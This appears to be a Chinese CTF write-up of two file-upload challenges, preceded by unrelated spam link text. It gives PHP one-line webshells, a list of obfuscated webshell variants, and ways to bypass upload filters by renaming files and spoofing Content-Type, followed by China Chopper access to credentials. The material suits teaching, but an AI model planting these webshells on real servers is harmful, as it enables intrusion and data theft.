第七色在线视频,2021少妇久久久久久久久久,亚洲欧洲精品成人久久av18,亚洲国产精品特色大片观看完整版,孙宇晨将参加特朗普的晚宴

為了賬號(hào)安全,請(qǐng)及時(shí)綁定郵箱和手機(jī)立即綁定

WEB 練習(xí)2——文件上傳基礎(chǔ)練習(xí)

標(biāo)簽:
安全

今天Evan为大家带来的是两道基础的文件上传题目,通过这两道题目大家可以学习到文件上传以及连接菜刀的基本操作。

  • Upload(百度杯九月场)

题目描述:想怎么传就怎么传,就是这么任性。hint:flag在flag.php中  

打开题目链接以后我们会发现这是一道文件上传的题目,并且题目说你可以随意上传文件,那我们上传一句话木马试一试。

https://img1.sycdn.imooc.com//5ba1f63f0001b06104910193.jpg

构造一个简单的一句话木马:

<?php @eval($_POST[value]);?>

上传文件,上传成功后我们打开上传的的文件看一下,会发现我们的一句话木马变成了这个样子:

@eval($_POST[value]);?>

说明过滤了<?以及PHP关键字,我们百度找一个厉害一点木马:

<script language="php">@eval_r($_POST[sb])</script>

再次上传并连接菜刀便可以找到flag.php文件

https://img1.sycdn.imooc.com//5ba1f7b40001cfaa10130203.jpg

这道题目是一道基础的文件上传,需要我们学会一句话木马以及菜刀的使用方式,在这里Evan为大家列举几个常见的比较特殊的一句话木马,在大家今后的学习中会经常用到。  

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  
$hh("/[discuz]/e",$_POST['h'],"Access");//菜刀一句话
$filename=$_GET['xbid'];  
include ($filename);//危险的include函数,直接编译任何文件为php格式运行
$reg="c"."o"."p"."y";  
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任何文件
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  
$gzid("/[discuz]/e",$_POST['h'],"Access");//菜刀一句话
include ($uid);//危险的include函数,直接编译任何文件为php格式运行
POST  //gif插一句话
  • Do you know upload?(第三届“百越杯”福建省高校网络空间安全大赛)

题目描述:加油吧,少年。

https://img1.sycdn.imooc.com//5ba2435000016dbe03850192.jpg

和上一道题目类似,只不过这道题目要求我们上传一张图片,我们有两种处理方式,在这里我为大家一一演示。

方法一:上传jpg

我们将写好的一句话木马制作成jpg格式,并且上传抓包

https://img1.sycdn.imooc.com//5ba244730001742e06260104.jpg

在这里我们将其更改成.php文件重新上传

https://img1.sycdn.imooc.com//5ba244a60001cdfa06240115.jpg

https://img1.sycdn.imooc.com//5ba244b00001a6c508470076.jpg

图片上传成功,我们可以看到图片存在upload/aaa333.php下方,菜刀连接。

https://img1.sycdn.imooc.com//5ba2469200011b7e07190296.jpg

在config配置文件中我们看到了数据库的用户名和密码,连接数据库,

https://img1.sycdn.imooc.com//5ba246c3000153e507880252.jpg

在数据库中我们拿到了flag。

https://img1.sycdn.imooc.com//5ba246de0001712003220134.jpg

方法二:上传.php文件

我们在这里也可以上传.php文件,但是网页会显示如下图所示的文件类型不允许,

https://img1.sycdn.imooc.com//5ba247860001258a05630225.jpg

于是我们对其进行抓包,

https://img1.sycdn.imooc.com//5ba247620001373906310086.jpg

更改Content-Type: application/octet-stream为Content-Type: image/jpeg,POST,接下来做法和上边的相同,小伙伴们可以自己动手试一下。

今天的讲解就到这里,在今后的文章中我会带领大家更深入的学习文件上传类题目,明天见~




點(diǎn)擊查看更多內(nèi)容
2人點(diǎn)贊

若覺得本文不錯(cuò),就分享一下吧!

評(píng)論

作者其他優(yōu)質(zhì)文章

正在加載中
感謝您的支持,我會(huì)繼續(xù)努力的~
掃碼打賞,你說多少就多少
贊賞金額會(huì)直接到老師賬戶
支付方式
打開微信掃一掃,即可進(jìn)行掃碼打賞哦
今天注冊(cè)有機(jī)會(huì)得

100積分直接送

付費(fèi)專欄免費(fèi)學(xué)

大額優(yōu)惠券免費(fèi)領(lǐng)

立即參與 放棄機(jī)會(huì)
微信客服

購課補(bǔ)貼
聯(lián)系客服咨詢優(yōu)惠詳情

幫助反饋 APP下載

慕課網(wǎng)APP
您的移動(dòng)學(xué)習(xí)伙伴

公眾號(hào)

掃描二維碼
關(guān)注慕課網(wǎng)微信公眾號(hào)

舉報(bào)

0/150
提交
取消